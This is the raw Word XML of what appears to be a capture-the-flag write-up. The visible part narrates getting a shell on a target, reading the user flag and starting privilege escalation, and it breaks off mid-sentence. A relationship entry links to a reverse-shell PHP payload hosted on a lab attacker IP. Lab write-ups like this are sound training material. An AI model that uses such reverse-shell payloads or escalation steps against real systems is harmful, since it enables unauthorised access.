                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1FB435" w14:textId="77777777" w:rsidR="002625A2" w:rsidRDefault="002625A2" w:rsidP="005B1369"/>
    <w:p w14:paraId="3A937A58" w14:textId="77777777" w:rsidR="002625A2" w:rsidRDefault="002625A2" w:rsidP="005B1369"/>
    <w:p w14:paraId="17AB01DF" w14:textId="53CDC3E0" w:rsidR="002625A2" w:rsidRDefault="002625A2" w:rsidP="005B1369">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>And after completing a few minor things I finally got a shell over the target machine!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6C160A" w14:textId="5F4E8185" w:rsidR="00E76F1E" w:rsidRDefault="002625A2" w:rsidP="005B1369">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61CBB45D" wp14:editId="5DA23C05">
            <wp:extent cx="7556500" cy="3246120"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="2066734947" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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6734947" name="תמונה 1" descr="תמונה שמכילה טקסט, צילום מסך, גופן&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7556500" cy="3246120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBD545E" w14:textId="0972752F" w:rsidR="00B05E2C" w:rsidRDefault="00B05E2C" w:rsidP="005B1369">
      <w:r>
        <w:t>I started navigating a bit and I found the user’s flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BE2189" w14:textId="6E7D3851" w:rsidR="00B05E2C" w:rsidRDefault="00B05E2C" w:rsidP="005B1369">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54E66A8B" wp14:editId="1D84C3D7">
            <wp:extent cx="7556500" cy="1478915"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6985"/>
            <wp:docPr id="1627968354" name="תמונה 1" descr="תמונה שמכילה טקסט, גופן, צילום מסך&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגו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7968354" name="תמונה 1" descr="תמונה שמכילה טקסט, גופן, צילום מסך&#10;&#10;תוכן בינה מלאכותית גנרטיבית עשוי להיות שגוי."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7556500" cy="1478915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0658F391" w14:textId="21F81B09" w:rsidR="00B05E2C" w:rsidRDefault="00491784" w:rsidP="00491784">
      <w:r>
        <w:t xml:space="preserve">At this point, I moved to find a way to privilege escalate. I started by exploring a few common techniques like “sudo -l” (that </w:t>
      </w:r>
      <w:r w:rsidR="001B6138">
        <w:t>wasn’t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> possible due to the fact the it require beth’s password) and “env” (which I didn’t find there anything important)</w:t>
      </w:r>
      <w:r w:rsidR="00765D90">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A060BD">
        <w:t xml:space="preserve"> Afterwards, I searched the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A060BD">
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A060BD">
        <w:t xml:space="preserve"> version and found it on “</w:t>
      </w:r>
      <w:r w:rsidR="00A060BD" w:rsidRPr="00A060BD">
        <w:t>/proc/version</w:t>
      </w:r>
      <w:r w:rsidR="00A060BD">
        <w:t>” :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D733321" w14:textId="6AE1E112" w:rsidR="00A060BD" w:rsidRDefault="001904B9" w:rsidP="00491784">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76845956" wp14:editId="61F8FC4C">
            <wp:extent cx="7556500" cy="419735"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="2015653104"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5653104" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7556500" cy="419735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5163F157" w14:textId="6032C888" w:rsidR="001904B9" w:rsidRDefault="001904B9" w:rsidP="00491784">
      <w:r>
        <w:t xml:space="preserve">Then I moved to google an exploit to this specific version and </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001904B9" w:rsidSect="00373463">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="170" w:right="170" w:bottom="170" w:left="170" w:header="720" w:footer="720" w:gutter="0"/>
      <w:cols w:space="720"/>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90C95"/>
    <w:rsid w:val="00007167"/>
    <w:rsid w:val="000151FB"/>
    <w:rsid w:val="00024B96"/>
    <w:rsid w:val="00031B9D"/>
    <w:rsid w:val="00046E1B"/>
    <w:rsid w:val="0006608C"/>
    <w:rsid w:val="000713F0"/>
    <w:rsid w:val="00092B3F"/>
    <w:rsid w:val="000D1D93"/>
    <w:rsid w:val="000E6E3E"/>
    <w:rsid w:val="000F23CA"/>
    <w:rsid w:val="000F6400"/>
    <w:rsid w:val="00112516"/>
    <w:rsid w:val="00115FED"/>
    <w:rsid w:val="00133044"/>
    <w:rsid w:val="001540A0"/>
    <w:rsid w:val="00162111"/>
    <w:rsid w:val="0018240B"/>
    <w:rsid w:val="001904B9"/>
    <w:rsid w:val="001A2508"/>
    <w:rsid w:val="001B6138"/>
    <w:rsid w:val="001E7995"/>
    <w:rsid w:val="00224D7C"/>
    <w:rsid w:val="002259DE"/>
    <w:rsid w:val="00230B84"/>
    <w:rsid w:val="0023591E"/>
    <w:rsid w:val="00255891"/>
    <w:rsid w:val="00257737"/>
    <w:rsid w:val="00260CAA"/>
    <w:rsid w:val="002625A2"/>
    <w:rsid w:val="00272BBC"/>
    <w:rsid w:val="0028406D"/>
    <w:rsid w:val="002857F8"/>
    <w:rsid w:val="0029678D"/>
    <w:rsid w:val="002A3701"/>
    <w:rsid w:val="002B4F52"/>
    <w:rsid w:val="002C1A4A"/>
    <w:rsid w:val="002C558A"/>
    <w:rsid w:val="00315842"/>
    <w:rsid w:val="00315ED4"/>
    <w:rsid w:val="00332C78"/>
    <w:rsid w:val="00334983"/>
    <w:rsid w:val="00336297"/>
    <w:rsid w:val="00343D3F"/>
    <w:rsid w:val="00364BB7"/>
    <w:rsid w:val="00373463"/>
    <w:rsid w:val="00377068"/>
    <w:rsid w:val="00394066"/>
    <w:rsid w:val="003A20C3"/>
    <w:rsid w:val="003D4BD4"/>
    <w:rsid w:val="003F489F"/>
    <w:rsid w:val="00403863"/>
    <w:rsid w:val="00415CF1"/>
    <w:rsid w:val="00435371"/>
    <w:rsid w:val="0045140D"/>
    <w:rsid w:val="004534BB"/>
    <w:rsid w:val="004571C3"/>
    <w:rsid w:val="004717BD"/>
    <w:rsid w:val="00482DBB"/>
    <w:rsid w:val="00491784"/>
    <w:rsid w:val="0049620E"/>
    <w:rsid w:val="004A52CE"/>
    <w:rsid w:val="004A6167"/>
    <w:rsid w:val="004A6C2F"/>
    <w:rsid w:val="004A72F6"/>
    <w:rsid w:val="004D66D2"/>
    <w:rsid w:val="004E02BE"/>
    <w:rsid w:val="00515E58"/>
    <w:rsid w:val="00526B2C"/>
    <w:rsid w:val="0053274A"/>
    <w:rsid w:val="00556BA3"/>
    <w:rsid w:val="005B0EFF"/>
    <w:rsid w:val="005B1369"/>
    <w:rsid w:val="005C16A2"/>
    <w:rsid w:val="005D2E84"/>
    <w:rsid w:val="005D61E3"/>
    <w:rsid w:val="005E2B37"/>
    <w:rsid w:val="005F528F"/>
    <w:rsid w:val="00632472"/>
    <w:rsid w:val="00646AE8"/>
    <w:rsid w:val="006548D6"/>
    <w:rsid w:val="006860D1"/>
    <w:rsid w:val="0069388D"/>
    <w:rsid w:val="00696B58"/>
    <w:rsid w:val="006B2AC2"/>
    <w:rsid w:val="006D362B"/>
    <w:rsid w:val="006F0B42"/>
    <w:rsid w:val="006F71F2"/>
    <w:rsid w:val="0072039E"/>
    <w:rsid w:val="00721EE1"/>
    <w:rsid w:val="007552F8"/>
    <w:rsid w:val="00765D90"/>
    <w:rsid w:val="00773BB1"/>
    <w:rsid w:val="00787A23"/>
    <w:rsid w:val="00790C95"/>
    <w:rsid w:val="007942FD"/>
    <w:rsid w:val="007B0FE3"/>
    <w:rsid w:val="007B28C4"/>
    <w:rsid w:val="007D7A84"/>
    <w:rsid w:val="007E38B0"/>
    <w:rsid w:val="00802222"/>
    <w:rsid w:val="008111E6"/>
    <w:rsid w:val="00812D2E"/>
    <w:rsid w:val="00822185"/>
    <w:rsid w:val="008226FD"/>
    <w:rsid w:val="008650EC"/>
    <w:rsid w:val="00882831"/>
    <w:rsid w:val="008908F2"/>
    <w:rsid w:val="008A1521"/>
    <w:rsid w:val="008A2C6D"/>
    <w:rsid w:val="008E6D0A"/>
    <w:rsid w:val="00931A21"/>
    <w:rsid w:val="009328FC"/>
    <w:rsid w:val="00972F0E"/>
    <w:rsid w:val="00976ED4"/>
    <w:rsid w:val="009A2520"/>
    <w:rsid w:val="009A31FE"/>
    <w:rsid w:val="009B0E8F"/>
    <w:rsid w:val="00A060BD"/>
    <w:rsid w:val="00A14AD7"/>
    <w:rsid w:val="00A23919"/>
    <w:rsid w:val="00A24C79"/>
    <w:rsid w:val="00A275B2"/>
    <w:rsid w:val="00A3598F"/>
    <w:rsid w:val="00A478A2"/>
    <w:rsid w:val="00A647B5"/>
    <w:rsid w:val="00A7244C"/>
    <w:rsid w:val="00A725B5"/>
    <w:rsid w:val="00AA2FDB"/>
    <w:rsid w:val="00AC3D7E"/>
    <w:rsid w:val="00AC4AEE"/>
    <w:rsid w:val="00AD0C68"/>
    <w:rsid w:val="00B05E2C"/>
    <w:rsid w:val="00B05E4B"/>
    <w:rsid w:val="00B35185"/>
    <w:rsid w:val="00B44702"/>
    <w:rsid w:val="00B73D25"/>
    <w:rsid w:val="00B87726"/>
    <w:rsid w:val="00BB4F4D"/>
    <w:rsid w:val="00BC5AFF"/>
    <w:rsid w:val="00BD0A55"/>
    <w:rsid w:val="00C078B8"/>
    <w:rsid w:val="00C15985"/>
    <w:rsid w:val="00C234E9"/>
    <w:rsid w:val="00C23639"/>
    <w:rsid w:val="00C24DAE"/>
    <w:rsid w:val="00C326ED"/>
    <w:rsid w:val="00C32775"/>
    <w:rsid w:val="00C3383C"/>
    <w:rsid w:val="00C363B8"/>
    <w:rsid w:val="00C47539"/>
    <w:rsid w:val="00C721BF"/>
    <w:rsid w:val="00CB4849"/>
    <w:rsid w:val="00CD323C"/>
    <w:rsid w:val="00CD446F"/>
    <w:rsid w:val="00CD50BC"/>
    <w:rsid w:val="00CE581D"/>
    <w:rsid w:val="00CF0646"/>
    <w:rsid w:val="00D25AD0"/>
    <w:rsid w:val="00D60B3C"/>
    <w:rsid w:val="00D62644"/>
    <w:rsid w:val="00D811F6"/>
    <w:rsid w:val="00D86457"/>
    <w:rsid w:val="00DC18F6"/>
    <w:rsid w:val="00DE3567"/>
    <w:rsid w:val="00DE78D2"/>
    <w:rsid w:val="00E059B4"/>
    <w:rsid w:val="00E16868"/>
    <w:rsid w:val="00E70CA2"/>
    <w:rsid w:val="00E76F1E"/>
    <w:rsid w:val="00EA0A8C"/>
    <w:rsid w:val="00EB2887"/>
    <w:rsid w:val="00EB79C0"/>
    <w:rsid w:val="00EC3AD2"/>
    <w:rsid w:val="00ED5B8A"/>
    <w:rsid w:val="00F04FF9"/>
    <w:rsid w:val="00F0678C"/>
    <w:rsid w:val="00F07E50"/>
    <w:rsid w:val="00F148C2"/>
    <w:rsid w:val="00F34000"/>
    <w:rsid w:val="00F51009"/>
    <w:rsid w:val="00F65D5D"/>
    <w:rsid w:val="00F71260"/>
    <w:rsid w:val="00F82E97"/>
    <w:rsid w:val="00FA509D"/>
    <w:rsid w:val="00FD5C95"/>
    <w:rsid w:val="00FD5FF9"/>
    <w:rsid w:val="00FE20C4"/>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1789EF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7C04EC73-011A-4EC3-B9E8-BCF468013F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he-IL"/>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790C9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790C9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790C95"/>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790C95"/>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790C95"/>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790C95"/>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790C95"/>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790C95"/>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790C95"/>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כותרת 1 תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="כותרת 2 תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="כותרת 3 תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="כותרת 4 תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="כותרת 5 תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="כותרת 6 תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="70">
    <w:name w:val="כותרת 7 תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="80">
    <w:name w:val="כותרת 8 תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="90">
    <w:name w:val="כותרת 9 תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00790C9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כותרת טקסט תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a3"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00790C95"/>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790C95"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a6">
    <w:name w:val="כותרת משנה תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="00790C95"/>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790C95"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a8">
    <w:name w:val="ציטוט תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00790C95"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00790C9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ציטוט חזק תו"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ab"/>
    <w:uiPriority w:val="30"/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ad">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00790C95"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C363B8"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ae">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C363B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10.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="setting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png"/><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24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.9.3.192:8000/rev_shell.php" TargetMode="External"/><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fontTable" Target="fontTable.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.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png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xm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519</TotalTime>
  <Pages>10</Pages>
  <Words>680</Words>
  <Characters>3877</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>32</Lines>
  <Paragraphs>9</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>שם</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="1" baseType="lpstr">
      <vt:lpstr/>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4548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יובל כוינה</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>יובל כוינה</cp:lastModifiedBy>
  <cp:revision>1184</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-13T21:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-21T12:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>